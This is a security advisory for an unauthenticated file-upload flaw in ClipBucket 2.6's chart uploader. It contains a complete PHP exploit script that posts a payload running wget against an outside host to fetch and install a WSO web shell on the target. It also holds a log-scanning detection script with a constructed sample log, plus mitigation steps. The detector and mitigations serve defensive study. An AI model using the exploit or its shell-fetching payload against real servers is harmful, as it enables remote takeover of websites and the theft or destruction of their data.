
ClipBucket Remote Code Execution

Source: vendor      Published: 2013-09-18 17:27:00

ClipBucket is free, open-source video-sharing software.

 

In ClipBucket 2.6 the bundled Open Flash Chart uploader script "/admin_area/charts/ofc-library/ofc_upload_image.php" can be reached without any authentication. It writes the raw POST body to a file under "/admin_area/charts/tmp-upload-images/" whose name is taken from the `name` query parameter, with no check on the extension, so an attacker can upload a PHP file and then request it, executing arbitrary code as the web server user (arbitrary shell upload).

 

Affected systems:

ClipBucket 2.6

 

 

Test method:

Warning! The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

#################################################################################################

# __________.__             _________                              _________
# \__    ___/|  |__   ____   \_   ___ \_______  ______  _  ________ \_   ___ \_______   ______  _  __
#   |    |   |  |  \_/ __ \  /    \  \/\_  __ \/  _ \ \/ \/ /  ___/ /    \  \/\_  __ \_/ __ \ \/ \/ /
#   |    |   |   Y  \  ___/  \     \____|  | \(  <_> )     /\___ \  \     \____|  | \/\  ___/\     /
#   |____|   |___|  /\___  >  \______  /|__|   \____/ \/\_//____  >  \______  /|__|    \___  >\/\_/
#                 \/     \/          \/                         \/          \/             \/
#
#
#http://thecrowscrew.org
#################################################################################################
# Exploit title : ClipBucket Remote Code Execution Vulnerability
# Author : Gabby
# Dork = use ur brain ;)
# Vendor Site : http://clip-bucket.com/
# Software Download : http://sourceforge.net/projects/clipbucket/
#################################################################################################
<?php
// Usage: php clip.php -t http://target.com -n bie.php
$options = getopt('t:n:');
if(!isset($options['t'], $options['n']))
die("\n      [+] Simple Exploiter ClipBucket by Gabby [+] \n Usage : php clip.php -t http://target.com -n bie.php\n
-t http://target.com   = Your target ..
-n bie.php             = Name of the file you want to use...\n\n");

$target =  $options['t'];
$nama   =  $options['n'];
// The uploader writes into tmp-upload-images/ using the ?name= value verbatim,
// so the dropped file lands at a predictable URL.
$shell  = "{$target}/admin_area/charts/tmp-upload-images/{$nama}";
$target = "{$target}/admin_area/charts/ofc-library/ofc_upload_image.php?name={$nama}";
// The raw POST body becomes the file contents. This first stage only fetches
// and renames a second-stage web shell.
$data   = '<?php
 system("wget http://gabby.ga/shell/wso.txt; mv wso.txt bie.php");
 fclose ( $handle );
 ?>';
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Content-Type: text/plain');
echo "============================================ \n";
echo ":   Simple Exploiter ClipBucket by Gabby   :\n";
echo "============================================ \n\n";
echo "[+] Uploading shell to : {$options['t']}\n";
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $target);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
$source = curl_exec($handle);
curl_close($handle);
// ofc_upload_image.php reads $HTTP_RAW_POST_DATA; if PHP reports it undefined
// nothing was written. Otherwise confirm the file is now served from tmp-upload-images/.
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo "[+] Exploit succeeded,.. :D\n";
echo "[+] {$shell}\n";
}
else
{
die("[-] Exploit failed,.. :(\n");
}

?>

Screenshots:
1. http://i.imgur.com/SZGVraC.png
2. http://i.imgur.com/1X0WzeH.png

#################################################################################################
Thanks to :
Catalyst71, kit4r0, 777r, ovanIsmycode, walangkaji, y0g4, my "Dad", my sista Wii, cW3 G4pt3K,
Red-x, Vanda, Deb, Sultan, Meninbox, n all my luvly friend,..
Greets to :
Yogyacarderlink, SurabayaBlackhat,..^^
#################################################################################################
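The PoC above leaves two distinctive traces in the web server access log: a request to ofc_upload_image.php whose `name` parameter would create a PHP-executable file (or escape the upload directory), and a later request for a PHP file under tmp-upload-images/. The following script, added here as an example and not part of the original advisory or of ClipBucket, flags both patterns in Apache/nginx combined-format logs. The log lines, the client addresses and the /clipbucket/ install prefix are constructed for the demonstration.

```python
"""Flag ClipBucket 2.6 ofc_upload_image.php exploitation attempts in access logs."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Paths named in the advisory: the unauthenticated uploader and the directory it writes to.
UPLOADER = "/admin_area/charts/ofc-library/ofc_upload_image.php"
DROP_DIR = "/admin_area/charts/tmp-upload-images/"

# Extensions a stock PHP handler executes. The trailing (\.|$) also catches
# double extensions such as shell.php.png that Apache mod_mime may still run.
PHP_EXT = re.compile(r"\.(php|php[3457]|phtml|phar|pht)(\.|$)", re.IGNORECASE)

# Combined log format, enough of it to recover client, method, URL and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(line):
    """Classify one access-log line; return a finding dict or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("url"))
    path = unquote(url.path).lower()
    base = {"ip": m.group("ip"), "time": m.group("time"), "status": m.group("status")}

    # A PHP file under tmp-upload-images/ being requested: the dropped shell in use.
    if DROP_DIR in path and PHP_EXT.search(path):
        return dict(base, kind="webshell-access", detail=path)

    # Any call to the uploader. parse_qs decodes ?name= once; decode again because
    # double-encoding the dot or the slashes is a common filter bypass.
    if path.endswith(UPLOADER):
        for raw in parse_qs(url.query).get("name", []):
            name = unquote(unquote(raw))
            if PHP_EXT.search(name) or ".." in name or "/" in name or "\\" in name:
                return dict(base, kind="write-attempt", detail=name)
        # No executable name, but the script is reachable unauthenticated, so keep it visible.
        return dict(base, kind="uploader-call", detail=url.query)
    return None


def scan(log_text):
    """Run classify() over every line and return the findings in log order."""
    findings = []
    for line in log_text.splitlines():
        f = classify(line)
        if f:
            findings.append(f)
    return findings


# Constructed sample log; not captured from a real host.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Sep/2013:17:27:01 +0000] "POST /admin_area/charts/ofc-library/ofc_upload_image.php?name=bie.php HTTP/1.1" 200 214 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1"
203.0.113.7 - - [18/Sep/2013:17:27:02 +0000] "GET /admin_area/charts/tmp-upload-images/bie.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [18/Sep/2013:17:30:00 +0000] "POST /clipbucket/admin_area/charts/ofc-library/ofc_upload_image.php?name=..%2F..%2Fx.phtml HTTP/1.1" 200 190 "-" "curl/7.29"
198.51.100.9 - - [18/Sep/2013:17:31:00 +0000] "POST /admin_area/charts/ofc-library/ofc_upload_image.php?name=chart%252Ephp HTTP/1.1" 200 190 "-" "curl/7.29"
192.0.2.44 - admin [18/Sep/2013:17:40:00 +0000] "POST /admin_area/charts/ofc-library/ofc_upload_image.php?name=chart.png HTTP/1.1" 200 190 "-" "Mozilla/5.0"
192.0.2.44 - admin [18/Sep/2013:17:41:00 +0000] "GET /admin_area/charts/tmp-upload-images/chart.png HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['kind']:16} {f['ip']:15} {f['status']} {f['detail']}")
```

The uploader-call finding is deliberately kept: a benign chart export looks identical to a probe, and on a 2.6 install the request was accepted without a session either way, so the client address and the absence of a logged admin user are what distinguish them.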

Solution: no fix is available at this time. Until one is, deny web access to admin_area/charts/ofc-library/ofc_upload_image.php at the web server (or remove the bundled Open Flash Chart upload script if chart export is not used), and check admin_area/charts/tmp-upload-images/ for files that are not images.

Vendor patch:

ClipBucket
----------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:

http://clip-bucket.com/
